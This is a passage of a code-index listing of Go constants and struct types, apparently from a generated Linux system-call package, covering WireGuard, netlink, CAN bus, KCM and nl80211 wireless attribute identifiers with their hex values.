WGPEER_A_PUBLIC_KEY (line 4307) | WGPEER_A_PUBLIC_KEY = 0x1 constant WGPEER_A_PRESHARED_KEY (line 4308) | WGPEER_A_PRESHARED_KEY = 0x2 constant WGPEER_A_FLAGS (line 4309) | WGPEER_A_FLAGS = 0x3 constant WGPEER_A_ENDPOINT (line 4310) | WGPEER_A_ENDPOINT = 0x4 constant WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL (line 4311) | WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL = 0x5 constant WGPEER_A_LAST_HANDSHAKE_TIME (line 4312) | WGPEER_A_LAST_HANDSHAKE_TIME = 0x6 constant WGPEER_A_RX_BYTES (line 4313) | WGPEER_A_RX_BYTES = 0x7 constant WGPEER_A_TX_BYTES (line 4314) | WGPEER_A_TX_BYTES = 0x8 constant WGPEER_A_ALLOWEDIPS (line 4315) | WGPEER_A_ALLOWEDIPS = 0x9 constant WGPEER_A_PROTOCOL_VERSION (line 4316) | WGPEER_A_PROTOCOL_VERSION = 0xa constant WGALLOWEDIP_A_UNSPEC (line 4317) | WGALLOWEDIP_A_UNSPEC = 0x0 constant WGALLOWEDIP_A_FAMILY (line 4318) | WGALLOWEDIP_A_FAMILY = 0x1 constant WGALLOWEDIP_A_IPADDR (line 4319) | WGALLOWEDIP_A_IPADDR = 0x2 constant WGALLOWEDIP_A_CIDR_MASK (line 4320) | WGALLOWEDIP_A_CIDR_MASK = 0x3 constant NL_ATTR_TYPE_INVALID (line 4324) | NL_ATTR_TYPE_INVALID = 0x0 constant NL_ATTR_TYPE_FLAG (line 4325) | NL_ATTR_TYPE_FLAG = 0x1 constant NL_ATTR_TYPE_U8 (line 4326) | NL_ATTR_TYPE_U8 = 0x2 constant NL_ATTR_TYPE_U16 (line 4327) | NL_ATTR_TYPE_U16 = 0x3 constant NL_ATTR_TYPE_U32 (line 4328) | NL_ATTR_TYPE_U32 = 0x4 constant NL_ATTR_TYPE_U64 (line 4329) | NL_ATTR_TYPE_U64 = 0x5 constant NL_ATTR_TYPE_S8 (line 4330) | NL_ATTR_TYPE_S8 = 0x6 constant NL_ATTR_TYPE_S16 (line 4331) | NL_ATTR_TYPE_S16 = 0x7 constant NL_ATTR_TYPE_S32 (line 4332) | NL_ATTR_TYPE_S32 = 0x8 constant NL_ATTR_TYPE_S64 (line 4333) | NL_ATTR_TYPE_S64 = 0x9 constant NL_ATTR_TYPE_BINARY (line 4334) | NL_ATTR_TYPE_BINARY = 0xa constant NL_ATTR_TYPE_STRING (line 4335) | NL_ATTR_TYPE_STRING = 0xb constant NL_ATTR_TYPE_NUL_STRING (line 4336) | NL_ATTR_TYPE_NUL_STRING = 0xc constant NL_ATTR_TYPE_NESTED (line 4337) | NL_ATTR_TYPE_NESTED = 0xd constant NL_ATTR_TYPE_NESTED_ARRAY (line 4338) | NL_ATTR_TYPE_NESTED_ARRAY = 0xe constant NL_ATTR_TYPE_BITFIELD32 (line 4339) | NL_ATTR_TYPE_BITFIELD32 = 0xf constant NL_POLICY_TYPE_ATTR_UNSPEC (line 4341) | NL_POLICY_TYPE_ATTR_UNSPEC = 0x0 constant NL_POLICY_TYPE_ATTR_TYPE (line 4342) | NL_POLICY_TYPE_ATTR_TYPE = 0x1 constant NL_POLICY_TYPE_ATTR_MIN_VALUE_S (line 4343) | NL_POLICY_TYPE_ATTR_MIN_VALUE_S = 0x2 constant NL_POLICY_TYPE_ATTR_MAX_VALUE_S (line 4344) | NL_POLICY_TYPE_ATTR_MAX_VALUE_S = 0x3 constant NL_POLICY_TYPE_ATTR_MIN_VALUE_U (line 4345) | NL_POLICY_TYPE_ATTR_MIN_VALUE_U = 0x4 constant NL_POLICY_TYPE_ATTR_MAX_VALUE_U (line 4346) | NL_POLICY_TYPE_ATTR_MAX_VALUE_U = 0x5 constant NL_POLICY_TYPE_ATTR_MIN_LENGTH (line 4347) | NL_POLICY_TYPE_ATTR_MIN_LENGTH = 0x6 constant NL_POLICY_TYPE_ATTR_MAX_LENGTH (line 4348) | NL_POLICY_TYPE_ATTR_MAX_LENGTH = 0x7 constant NL_POLICY_TYPE_ATTR_POLICY_IDX (line 4349) | NL_POLICY_TYPE_ATTR_POLICY_IDX = 0x8 constant NL_POLICY_TYPE_ATTR_POLICY_MAXTYPE (line 4350) | NL_POLICY_TYPE_ATTR_POLICY_MAXTYPE = 0x9 constant NL_POLICY_TYPE_ATTR_BITFIELD32_MASK (line 4351) | NL_POLICY_TYPE_ATTR_BITFIELD32_MASK = 0xa constant NL_POLICY_TYPE_ATTR_PAD (line 4352) | NL_POLICY_TYPE_ATTR_PAD = 0xb constant NL_POLICY_TYPE_ATTR_MASK (line 4353) | NL_POLICY_TYPE_ATTR_MASK = 0xc constant NL_POLICY_TYPE_ATTR_MAX (line 4354) | NL_POLICY_TYPE_ATTR_MAX = 0xc type CANBitTiming (line 4357) | type CANBitTiming struct type CANBitTimingConst (line 4368) | type CANBitTimingConst struct type CANClock (line 4380) | type CANClock struct type CANBusErrorCounters (line 4384) | type CANBusErrorCounters struct type CANCtrlMode (line 4389) | type CANCtrlMode struct type CANDeviceStats (line 4394) | type CANDeviceStats struct constant CAN_STATE_ERROR_ACTIVE (line 4404) | CAN_STATE_ERROR_ACTIVE = 0x0 constant CAN_STATE_ERROR_WARNING (line 4405) | CAN_STATE_ERROR_WARNING = 0x1 constant CAN_STATE_ERROR_PASSIVE (line 4406) | CAN_STATE_ERROR_PASSIVE = 0x2 constant CAN_STATE_BUS_OFF (line 4407) | CAN_STATE_BUS_OFF = 0x3 constant CAN_STATE_STOPPED (line 4408) | CAN_STATE_STOPPED = 0x4 constant CAN_STATE_SLEEPING (line 4409) | CAN_STATE_SLEEPING = 0x5 constant CAN_STATE_MAX (line 4410) | CAN_STATE_MAX = 0x6 constant IFLA_CAN_UNSPEC (line 4414) | IFLA_CAN_UNSPEC = 0x0 constant IFLA_CAN_BITTIMING (line 4415) | IFLA_CAN_BITTIMING = 0x1 constant IFLA_CAN_BITTIMING_CONST (line 4416) | IFLA_CAN_BITTIMING_CONST = 0x2 constant IFLA_CAN_CLOCK (line 4417) | IFLA_CAN_CLOCK = 0x3 constant IFLA_CAN_STATE (line 4418) | IFLA_CAN_STATE = 0x4 constant IFLA_CAN_CTRLMODE (line 4419) | IFLA_CAN_CTRLMODE = 0x5 constant IFLA_CAN_RESTART_MS (line 4420) | IFLA_CAN_RESTART_MS = 0x6 constant IFLA_CAN_RESTART (line 4421) | IFLA_CAN_RESTART = 0x7 constant IFLA_CAN_BERR_COUNTER (line 4422) | IFLA_CAN_BERR_COUNTER = 0x8 constant IFLA_CAN_DATA_BITTIMING (line 4423) | IFLA_CAN_DATA_BITTIMING = 0x9 constant IFLA_CAN_DATA_BITTIMING_CONST (line 4424) | IFLA_CAN_DATA_BITTIMING_CONST = 0xa constant IFLA_CAN_TERMINATION (line 4425) | IFLA_CAN_TERMINATION = 0xb constant IFLA_CAN_TERMINATION_CONST (line 4426) | IFLA_CAN_TERMINATION_CONST = 0xc constant IFLA_CAN_BITRATE_CONST (line 4427) | IFLA_CAN_BITRATE_CONST = 0xd constant IFLA_CAN_DATA_BITRATE_CONST (line 4428) | IFLA_CAN_DATA_BITRATE_CONST = 0xe constant IFLA_CAN_BITRATE_MAX (line 4429) | IFLA_CAN_BITRATE_MAX = 0xf type KCMAttach (line 4432) | type KCMAttach struct type KCMUnattach (line 4437) | type KCMUnattach struct type KCMClone (line 4441) | type KCMClone struct constant NL80211_AC_BE (line 4446) | NL80211_AC_BE = 0x2 constant NL80211_AC_BK (line 4447) | NL80211_AC_BK = 0x3 constant NL80211_ACL_POLICY_ACCEPT_UNLESS_LISTED (line 4448) | NL80211_ACL_POLICY_ACCEPT_UNLESS_LISTED = 0x0 constant NL80211_ACL_POLICY_DENY_UNLESS_LISTED (line 4449) | NL80211_ACL_POLICY_DENY_UNLESS_LISTED = 0x1 constant NL80211_AC_VI (line 4450) | NL80211_AC_VI = 0x1 constant NL80211_AC_VO (line 4451) | NL80211_AC_VO = 0x0 constant NL80211_AP_SETTINGS_EXTERNAL_AUTH_SUPPORT (line 4452) | NL80211_AP_SETTINGS_EXTERNAL_AUTH_SUPPORT = 0x1 constant NL80211_AP_SETTINGS_SA_QUERY_OFFLOAD_SUPPORT (line 4453) | NL80211_AP_SETTINGS_SA_QUERY_OFFLOAD_SUPPORT = 0x2 constant NL80211_AP_SME_SA_QUERY_OFFLOAD (line 4454) | NL80211_AP_SME_SA_QUERY_OFFLOAD = 0x1 constant NL80211_ATTR_4ADDR (line 4455) | NL80211_ATTR_4ADDR = 0x53 constant NL80211_ATTR_ACK (line 4456) | NL80211_ATTR_ACK = 0x5c constant NL80211_ATTR_ACK_SIGNAL (line 4457) | NL80211_ATTR_ACK_SIGNAL = 0x107 constant NL80211_ATTR_ACL_POLICY (line 4458) | NL80211_ATTR_ACL_POLICY = 0xa5 constant NL80211_ATTR_ADMITTED_TIME (line 4459) | NL80211_ATTR_ADMITTED_TIME = 0xd4 constant NL80211_ATTR_AIRTIME_WEIGHT (line 4460) | NL80211_ATTR_AIRTIME_WEIGHT = 0x112 constant NL80211_ATTR_AKM_SUITES (line 4461) | NL80211_ATTR_AKM_SUITES = 0x4c constant NL80211_ATTR_AP_ISOLATE (line 4462) | NL80211_ATTR_AP_ISOLATE = 0x60 constant NL80211_ATTR_AP_SETTINGS_FLAGS (line 4463) | NL80211_ATTR_AP_SETTINGS_FLAGS = 0x135 constant NL80211_ATTR_AUTH_DATA (line 4464) | NL80211_ATTR_AUTH_DATA = 0x9c constant NL80211_ATTR_AUTH_TYPE (line 4465) | NL80211_ATTR_AUTH_TYPE = 0x35 constant NL80211_ATTR_BANDS (line 4466) | NL80211_ATTR_BANDS = 0xef constant NL80211_ATTR_BEACON_HEAD (line 4467) | NL80211_ATTR_BEACON_HEAD = 0xe constant NL80211_ATTR_BEACON_INTERVAL (line 4468) | NL80211_ATTR_BEACON_INTERVAL = 0xc constant NL80211_ATTR_BEACON_TAIL (line 4469) | NL80211_ATTR_BEACON_TAIL = 0xf constant NL80211_ATTR_BG_SCAN_PERIOD (line 4470) | NL80211_ATTR_BG_SCAN_PERIOD = 0x98 constant NL80211_ATTR_BSS_BASIC_RATES (line 4471) | NL80211_ATTR_BSS_BASIC_RATES = 0x24 constant NL80211_ATTR_BSS (line 4472) | NL80211_ATTR_BSS = 0x2f constant NL80211_ATTR_BSS_CTS_PROT (line 4473) | NL80211_ATTR_BSS_CTS_PROT = 0x1c constant NL80211_ATTR_BSS_HT_OPMODE (line 4474) | NL80211_ATTR_BSS_HT_OPMODE = 0x6d constant NL80211_ATTR_BSSID (line 4475) | NL80211_ATTR_BSSID = 0xf5 constant NL80211_ATTR_BSS_SELECT (line 4476) | NL80211_ATTR_BSS_SELECT = 0xe3 constant NL80211_ATTR_BSS_SHORT_PREAMBLE (line 4477) | NL80211_ATTR_BSS_SHORT_PREAMBLE = 0x1d constant NL80211_ATTR_BSS_SHORT_SLOT_TIME (line 4478) | NL80211_ATTR_BSS_SHORT_SLOT_TIME = 0x1e constant NL80211_ATTR_CENTER_FREQ1 (line 4479) | NL80211_ATTR_CENTER_FREQ1 = 0xa0 constant NL80211_ATTR_CENTER_FREQ1_OFFSET (line 4480) | NL80211_ATTR_CENTER_FREQ1_OFFSET = 0x123 constant NL80211_ATTR_CENTER_FREQ2 (line 4481) | NL80211_ATTR_CENTER_FREQ2 = 0xa1 constant NL80211_ATTR_CHANNEL_WIDTH (line 4482) | NL80211_ATTR_CHANNEL_WIDTH = 0x9f constant NL80211_ATTR_CH_SWITCH_BLOCK_TX (line 4483) | NL80211_ATTR_CH_SWITCH_BLOCK_TX = 0xb8 constant NL80211_ATTR_CH_SWITCH_COUNT (line 4484) | NL80211_ATTR_CH_SWITCH_COUNT = 0xb7 constant NL80211_ATTR_CIPHER_SUITE_GROUP (line 4485) | NL80211_ATTR_CIPHER_SUITE_GROUP = 0x4a constant NL80211_ATTR_CIPHER_SUITES (line 4486) | NL80211_ATTR_CIPHER_SUITES = 0x39 constant NL80211_ATTR_CIPHER_SUITES_PAIRWISE (line 4487) | NL80211_ATTR_CIPHER_SUITES_PAIRWISE = 0x49 constant NL80211_ATTR_CNTDWN_OFFS_BEACON (line 4488) | NL80211_ATTR_CNTDWN_OFFS_BEACON = 0xba constant NL80211_ATTR_CNTDWN_OFFS_PRESP (line 4489) | NL80211_ATTR_CNTDWN_OFFS_PRESP = 0xbb constant NL80211_ATTR_COALESCE_RULE (line 4490) | NL80211_ATTR_COALESCE_RULE = 0xb6 constant NL80211_ATTR_COALESCE_RULE_CONDITION (line 4491) | NL80211_ATTR_COALESCE_RULE_CONDITION = 0x2 constant NL80211_ATTR_COALESCE_RULE_DELAY (line 4492) | NL80211_ATTR_COALESCE_RULE_DELAY = 0x1 constant NL80211_ATTR_COALESCE_RULE_MAX (line 4493) | NL80211_ATTR_COALESCE_RULE_MAX = 0x3 constant NL80211_ATTR_COALESCE_RULE_PKT_PATTERN (line 4494) | NL80211_ATTR_COALESCE_RULE_PKT_PATTERN = 0x3 constant NL80211_ATTR_COLOR_CHANGE_COLOR (line 4495) | NL80211_ATTR_COLOR_CHANGE_COLOR = 0x130 constant NL80211_ATTR_COLOR_CHANGE_COUNT (line 4496) | NL80211_ATTR_COLOR_CHANGE_COUNT = 0x12f constant NL80211_ATTR_COLOR_CHANGE_ELEMS (line 4497) | NL80211_ATTR_COLOR_CHANGE_ELEMS = 0x131 constant NL80211_ATTR_CONN_FAILED_REASON (line 4498) | NL80211_ATTR_CONN_FAILED_REASON = 0x9b constant NL80211_ATTR_CONTROL_PORT (line 4499) | NL80211_ATTR_CONTROL_PORT = 0x44 constant NL80211_ATTR_CONTROL_PORT_ETHERTYPE (line 4500) | NL80211_ATTR_CONTROL_PORT_ETHERTYPE = 0x66 constant NL80211_ATTR_CONTROL_PORT_NO_ENCRYPT (line 4501) | NL80211_ATTR_CONTROL_PORT_NO_ENCRYPT = 0x67 constant NL80211_ATTR_CONTROL_PORT_NO_PREAUTH (line 4502) | NL80211_ATTR_CONTROL_PORT_NO_PREAUTH = 0x11e constant NL80211_ATTR_CONTROL_PORT_OVER_NL80211 (line 4503) | NL80211_ATTR_CONTROL_PORT_OVER_NL80211 = 0x108 constant NL80211_ATTR_COOKIE (line 4504) | NL80211_ATTR_COOKIE = 0x58 constant NL80211_ATTR_CQM_BEACON_LOSS_EVENT (line 4505) | NL80211_ATTR_CQM_BEACON_LOSS_EVENT = 0x8 constant NL80211_ATTR_CQM (line 4506) | NL80211_ATTR_CQM = 0x5e constant NL80211_ATTR_CQM_MAX (line 4507) | NL80211_ATTR_CQM_MAX = 0x9 constant NL80211_ATTR_CQM_PKT_LOSS_EVENT (line 4508) | NL80211_ATTR_CQM_PKT_LOSS_EVENT = 0x4 constant NL80211_ATTR_CQM_RSSI_HYST (line 4509) | NL80211_ATTR_CQM_RSSI_HYST = 0x2 constant NL80211_ATTR_CQM_RSSI_LEVEL (line 4510) | NL80211_ATTR_CQM_RSSI_LEVEL = 0x9 constant NL80211_ATTR_CQM_RSSI_THOLD (line 4511) | NL80211_ATTR_CQM_RSSI_THOLD = 0x1 constant NL80211_ATTR_CQM_RSSI_THRESHOLD_EVENT (line 4512) | NL80211_ATTR_CQM_RSSI_THRESHOLD_EVENT = 0x3 constant NL80211_ATTR_CQM_TXE_INTVL (line 4513) | NL80211_ATTR_CQM_TXE_INTVL = 0x7 constant NL80211_ATTR_CQM_TXE_PKTS (line 4514) | NL80211_ATTR_CQM_TXE_PKTS = 0x6 constant NL80211_ATTR_CQM_TXE_RATE (line 4515) | NL80211_ATTR_CQM_TXE_RATE = 0x5 constant NL80211_ATTR_CRIT_PROT_ID (line 4516) | NL80211_ATTR_CRIT_PROT_ID = 0xb3 constant NL80211_ATTR_CSA_C_OFF_BEACON (line 4517) | NL80211_ATTR_CSA_C_OFF_BEACON = 0xba constant NL80211_ATTR_CSA_C_OFF_PRESP (line 4518) | NL80211_ATTR_CSA_C_OFF_PRESP = 0xbb constant NL80211_ATTR_CSA_C_OFFSETS_TX (line 4519) | NL80211_ATTR_CSA_C_OFFSETS_TX = 0xcd constant NL80211_ATTR_CSA_IES (line 4520) | NL80211_ATTR_CSA_IES = 0xb9 constant NL80211_ATTR_DEVICE_AP_SME (line 4521) | NL80211_ATTR_DEVICE_AP_SME = 0x8d constant NL80211_ATTR_DFS_CAC_TIME (line 4522) | NL80211_ATTR_DFS_CAC_TIME = 0x7 constant NL80211_ATTR_DFS_REGION (line 4523) | NL80211_ATTR_DFS_REGION = 0x92 constant NL80211_ATTR_DISABLE_EHT (line 4524) | NL80211_ATTR_DISABLE_EHT = 0x137 constant NL80211_ATTR_DISABLE_HE (line 4525) | NL80211_ATTR_DISABLE_HE = 0x12d constant NL80211_ATTR_DISABLE_HT (line 4526) | NL80211_ATTR_DISABLE_HT = 0x93 constant NL80211_ATTR_DISABLE_VHT (line 4527) | NL80211_ATTR_DISABLE_VHT = 0xaf constant NL80211_ATTR_DISCONNECTED_BY_AP (line 4528) | NL80211_ATTR_DISCONNECTED_BY_AP = 0x47 constant NL80211_ATTR_DONT_WAIT_FOR_ACK (line 4529) | NL80211_ATTR_DONT_WAIT_FOR_ACK = 0x8e constant NL80211_ATTR_DTIM_PERIOD (line 4530) | NL80211_ATTR_DTIM_PERIOD = 0xd constant NL80211_ATTR_DURATION (line 4531) | NL80211_ATTR_DURATION = 0x57 constant NL80211_ATTR_EHT_CAPABILITY (line 4532) | NL80211_ATTR_EHT_CAPABILITY = 0x136 constant NL80211_ATTR_EML_CAPABILITY (line 4533) | NL80211_ATTR_EML_CAPABILITY = 0x13d constant NL80211_ATTR_EXT_CAPA (line 4534) | NL80211_ATTR_EXT_CAPA = 0xa9 constant NL80211_ATTR_EXT_CAPA_MASK (line 4535) | NL80211_ATTR_EXT_CAPA_MASK = 0xaa constant NL80211_ATTR_EXTERNAL_AUTH_ACTION (line 4536) | NL80211_ATTR_EXTERNAL_AUTH_ACTION = 0x104 constant NL80211_ATTR_EXTERNAL_AUTH_SUPPORT (line 4537) | NL80211_ATTR_EXTERNAL_AUTH_SUPPORT = 0x105 constant NL80211_ATTR_EXT_FEATURES (line 4538) | NL80211_ATTR_EXT_FEATURES = 0xd9 constant NL80211_ATTR_FEATURE_FLAGS (line 4539) | NL80211_ATTR_FEATURE_FLAGS = 0x8f constant NL80211_ATTR_FILS_CACHE_ID (line 4540) | NL80211_ATTR_FILS_CACHE_ID = 0xfd constant NL80211_ATTR_FILS_DISCOVERY (line 4541) | NL80211_ATTR_FILS_DISCOVERY = 0x126 constant NL80211_ATTR_FILS_ERP_NEXT_SEQ_NUM (line 4542) | NL80211_ATTR_FILS_ERP_NEXT_SEQ_NUM = 0xfb constant NL80211_ATTR_FILS_ERP_REALM (line 4543) | NL80211_ATTR_FILS_ERP_REALM = 0xfa constant NL80211_ATTR_FILS_ERP_RRK (line 4544) | NL80211_ATTR_FILS_ERP_RRK = 0xfc constant NL80211_ATTR_FILS_ERP_USERNAME (line 4545) | NL80211_ATTR_FILS_ERP_USERNAME = 0xf9 constant NL80211_ATTR_FILS_KEK (line 4546) | NL80211_ATTR_FILS_KEK = 0xf2 constant NL80211_ATTR_FILS_NONCES (line 4547) | NL80211_ATTR_FILS_NONCES = 0xf3 constant NL80211_ATTR_FRAME (line 4548) | NL80211_ATTR_FRAME = 0x33 constant NL80211_ATTR_FRAME_MATCH (line 4549) | NL80211_ATTR_FRAME_MATCH = 0x5b constant NL80211_ATTR_FRAME_TYPE (line 4550) | NL80211_ATTR_FRAME_TYPE = 0x65 constant NL80211_ATTR_FREQ_AFTER (line 4551) | NL80211_ATTR_FREQ_AFTER = 0x3b constant NL80211_ATTR_FREQ_BEFORE (line 4552) | NL80211_ATTR_FREQ_BEFORE = 0x3a constant NL80211_ATTR_FREQ_FIXED (line 4553) | NL80211_ATTR_FREQ_FIXED = 0x3c constant NL80211_ATTR_FREQ_RANGE_END (line 4554) | NL80211_ATTR_FREQ_RANGE_END = 0x3 constant NL80211_ATTR_FREQ_RANGE_MAX_BW (line 4555) | NL80211_ATTR_FREQ_RANGE_MAX_BW = 0x4 constant NL80211_ATTR_FREQ_RANGE_START (line 4556) | NL80211_ATTR_FREQ_RANGE_START = 0x2 constant NL80211_ATTR_FTM_RESPONDER (line 4557) | NL80211_ATTR_FTM_RESPONDER = 0x10e constant NL80211_ATTR_FTM_RESPONDER_STATS (line 4558) | NL80211_ATTR_FTM_RESPONDER_STATS = 0x10f constant NL80211_ATTR_GENERATION (line 4559) | NL80211_ATTR_GENERATION = 0x2e constant NL80211_ATTR_HANDLE_DFS (line 4560) | NL80211_ATTR_HANDLE_DFS = 0xbf constant NL80211_ATTR_HE_6GHZ_CAPABILITY (line 4561) | NL80211_ATTR_HE_6GHZ_CAPABILITY = 0x125 constant NL80211_ATTR_HE_BSS_COLOR (line 4562) | NL80211_ATTR_HE_BSS_COLOR = 0x11b constant NL80211_ATTR_HE_CAPABILITY (line 4563) | NL80211_ATTR_HE_CAPABILITY = 0x10d constant NL80211_ATTR_HE_OBSS_PD (line 4564) | NL80211_ATTR_HE_OBSS_PD = 0x117 constant NL80211_ATTR_HIDDEN_SSID (line 4565) | NL80211_ATTR_HIDDEN_SSID = 0x7e constant NL80211_ATTR_HT_CAPABILITY (line 4566) | NL80211_ATTR_HT_CAPABILITY = 0x1f constant NL80211_ATTR_HT_CAPABILITY_MASK (line 4567) | NL80211_ATTR_HT_CAPABILITY_MASK = 0x94 constant NL80211_ATTR_IE_ASSOC_RESP (line 4568) | NL80211_ATTR_IE_ASSOC_RESP = 0x80 constant NL80211_ATTR_IE (line 4569) | NL80211_ATTR_IE = 0x2a constant NL80211_ATTR_IE_PROBE_RESP (line 4570) | NL80211_ATTR_IE_PROBE_RESP = 0x7f constant NL80211_ATTR_IE_RIC (line 4571) | NL80211_ATTR_IE_RIC = 0xb2 constant NL80211_ATTR_IFACE_SOCKET_OWNER (line 4572) | NL80211_ATTR_IFACE_SOCKET_OWNER = 0xcc constant NL80211_ATTR_IFINDEX (line 4573) | NL80211_ATTR_IFINDEX = 0x3 constant NL80211_ATTR_IFNAME (line 4574) | NL80211_ATTR_IFNAME = 0x4 constant NL80211_ATTR_IFTYPE_AKM_SUITES (line 4575) | NL80211_ATTR_IFTYPE_AKM_SUITES = 0x11c constant NL80211_ATTR_IFTYPE (line 4576) | NL80211_ATTR_IFTYPE = 0x5 constant NL80211_ATTR_IFTYPE_EXT_CAPA (line 4577) | NL80211_ATTR_IFTYPE_EXT_CAPA = 0xe6 constant NL80211_ATTR_INACTIVITY_TIMEOUT (line 4578) | NL80211_ATTR_INACTIVITY_TIMEOUT = 0x96 constant NL80211_ATTR_INTERFACE_COMBINATIONS (line 4579) | NL80211_ATTR_INTERFACE_COMBINATIONS = 0x78 constant NL80211_ATTR_KEY_CIPHER (line 4580) | NL80211_ATTR_KEY_CIPHER = 0x9 constant NL80211_ATTR_KEY (line 4581) | NL80211_ATTR_KEY = 0x50 constant NL80211_ATTR_KEY_DATA (line 4582) | NL80211_ATTR_KEY_DATA = 0x7 constant NL80211_ATTR_KEY_DEFAULT (line 4583) | NL80211_ATTR_KEY_DEFAULT = 0xb constant NL80211_ATTR_KEY_DEFAULT_MGMT (line 4584) | NL80211_ATTR_KEY_DEFAULT_MGMT = 0x28 constant NL80211_ATTR_KEY_DEFAULT_TYPES (line 4585) | NL80211_ATTR_KEY_DEFAULT_TYPES = 0x6e constant NL80211_ATTR_KEY_IDX (line 4586) | NL80211_ATTR_KEY_IDX = 0x8 constant NL80211_ATTR_KEYS (line 4587) | NL80211_ATTR_KEYS = 0x51 constant NL80211_ATTR_KEY_SEQ (line 4588) | NL80211_ATTR_KEY_SEQ = 0xa constant NL80211_ATTR_KEY_TYPE (line 4589) | NL80211_ATTR_KEY_TYPE = 0x37 constant NL80211_ATTR_LOCAL_MESH_POWER_MODE (line 4590) | NL80211_ATTR_LOCAL_MESH_POWER_MODE = 0xa4 constant NL80211_ATTR_LOCAL_STATE_CHANGE (line 4591) | NL80211_ATTR_LOCAL_STATE_CHANGE = 0x5f constant NL80211_ATTR_MAC_ACL_MAX (line 4592) | NL80211_ATTR_MAC_ACL_MAX = 0xa7 constant NL80211_ATTR_MAC_ADDRS (line 4593) | NL80211_ATTR_MAC_ADDRS = 0xa6 constant NL80211_ATTR_MAC (line 4594) | NL80211_ATTR_MAC = 0x6 constant NL80211_ATTR_MAC_HINT (line 4595) | NL80211_ATTR_MAC_HINT = 0xc8 constant NL80211_ATTR_MAC_MASK (line 4596) | NL80211_ATTR_MAC_MASK = 0xd7 constant NL80211_ATTR_MAX_AP_ASSOC_STA (line 4597) | NL80211_ATTR_MAX_AP_ASSOC_STA = 0xca constant NL80211_ATTR_MAX (line 4598) | NL80211_ATTR_MAX = 0x146 constant NL80211_ATTR_MAX_CRIT_PROT_DURATION (line 4599) | NL80211_ATTR_MAX_CRIT_PROT_DURATION = 0xb4 constant NL80211_ATTR_MAX_CSA_COUNTERS (line 4600) | NL80211_ATTR_MAX_CSA_COUNTERS = 0xce constant NL80211_ATTR_MAX_MATCH_SETS (line 4601) | NL80211_ATTR_MAX_MATCH_SETS = 0x85 constant NL80211_ATTR_MAX_NUM_AKM_SUITES (line 4602) | NL80211_ATTR_MAX_NUM_AKM_SUITES = 0x13c constant NL80211_ATTR_MAX_NUM_PMKIDS (line 4603) | NL80211_ATTR_MAX_NUM_PMKIDS = 0x56 constant NL80211_ATTR_MAX_NUM_SCAN_SSIDS (line 4604) | NL80211_ATTR_MAX_NUM_SCAN_SSIDS = 0x2b constant NL80211_ATTR_MAX_NUM_SCHED_SCAN_PLANS (line 4605) | NL80211_ATTR_MAX_NUM_SCHED_SCAN_PLANS = 0xde constant NL80211_ATTR_MAX_NUM_SCHED_SCAN_SSIDS (line 4606) | NL80211_ATTR_MAX_NUM_SCHED_SCAN_SSIDS = 0x7b constant NL80211_ATTR_MAX_REMAIN_ON_CHANNEL_DURATION (line 4607) | NL80211_ATTR_MAX_REMAIN_ON_CHANNEL_DURATION = 0x6f constant NL80211_ATTR_MAX_SCAN_IE_LEN (line 4608) | NL80211_ATTR_MAX_SCAN_IE_LEN = 0x38 constant NL80211_ATTR_MAX_SCAN_PLAN_INTERVAL (line 4609) | NL80211_ATTR_MAX_SCAN_PLAN_INTERVAL = 0xdf constant NL80211_ATTR_MAX_SCAN_PLAN_ITERATIONS (line 4610) | NL80211_ATTR_MAX_SCAN_PLAN_ITERATIONS = 0xe0 constant NL80211_ATTR_MAX_SCHED_SCAN_IE_LEN (line 4611) | NL80211_ATTR_MAX_SCHED_SCAN_IE_LEN = 0x7c constant NL80211_ATTR_MBSSID_CONFIG (line 4612) | NL80211_ATTR_MBSSID_CONFIG = 0x132 constant NL80211_ATTR_MBSSID_ELEMS (line 4613) | NL80211_ATTR_MBSSID_ELEMS = 0x133 constant NL80211_ATTR_MCAST_RATE (line 4614) | NL80211_ATTR_MCAST_RATE = 0x6b constant NL80211_ATTR_MDID (line 4615) | NL80211_ATTR_MDID = 0xb1 constant NL80211_ATTR_MEASUREMENT_DURATION (line 4616) | NL80211_ATTR_MEASUREMENT_DURATION = 0xeb constant NL80211_ATTR_MEASUREMENT_DURATION_MANDATORY (line 4617) | NL80211_ATTR_MEASUREMENT_DURATION_MANDATORY = 0xec constant NL80211_ATTR_MESH_CONFIG (line 4618) | NL80211_ATTR_MESH_CONFIG = 0x23 constant NL80211_ATTR_MESH_ID (line 4619) | NL80211_ATTR_MESH_ID = 0x18 constant NL80211_ATTR_MESH_PEER_AID (line 4620) | NL80211_ATTR_MESH_PEER_AID = 0xed constant NL80211_ATTR_MESH_SETUP (line 4621) | NL80211_ATTR_MESH_SETUP = 0x70 constant NL80211_ATTR_MGMT_SUBTYPE (line 4622) | NL80211_ATTR_MGMT_SUBTYPE = 0x29 constant NL80211_ATTR_MLD_ADDR (line 4623) | NL80211_ATTR_MLD_ADDR = 0x13a constant NL80211_ATTR_MLD_CAPA_AND_OPS (line 4624) | NL80211_ATTR_MLD_CAPA_AND_OPS = 0x13e constant NL80211_ATTR_MLO_LINK_ID (line 4625) | NL80211_ATTR_MLO_LINK_ID = 0x139 constant NL80211_ATTR_MLO_LINKS (line 4626) | NL80211_ATTR_MLO_LINKS = 0x138 constant NL80211_ATTR_MLO_SUPPORT (line 4627) | NL80211_ATTR_MLO_SUPPORT = 0x13b constant NL80211_ATTR_MNTR_FLAGS (line 4628) | NL80211_ATTR_MNTR_FLAGS = 0x17 constant NL80211_ATTR_MPATH_INFO (line 4629) | NL80211_ATTR_MPATH_INFO = 0x1b constant NL80211_ATTR_MPATH_NEXT_HOP (line 4630) | NL80211_ATTR_MPATH_NEXT_HOP = 0x1a constant NL80211_ATTR_MULTICAST_TO_UNICAST_ENABLED (line 4631) | NL80211_ATTR_MULTICAST_TO_UNICAST_ENABLED = 0xf4 constant NL80211_ATTR_MU_MIMO_FOLLOW_MAC_ADDR (line 4632) | NL80211_ATTR_MU_MIMO_FOLLOW_MAC_ADDR = 0xe8 constant NL80211_ATTR_MU_MIMO_GROUP_DATA (line 4633) | NL80211_ATTR_MU_MIMO_GROUP_DATA = 0xe7 constant NL80211_ATTR_NAN_FUNC (line 4634) | NL80211_ATTR_NAN_FUNC = 0xf0 constant NL80211_ATTR_NAN_MASTER_PREF (line 4635) | NL80211_ATTR_NAN_MASTER_PREF = 0xee constant NL80211_ATTR_NAN_MATCH (line 4636) | NL80211_ATTR_NAN_MATCH = 0xf1 constant NL80211_ATTR_NETNS_FD (line 4637) | NL80211_ATTR_NETNS_FD = 0xdb constant NL80211_ATTR_NOACK_MAP (line 4638) | 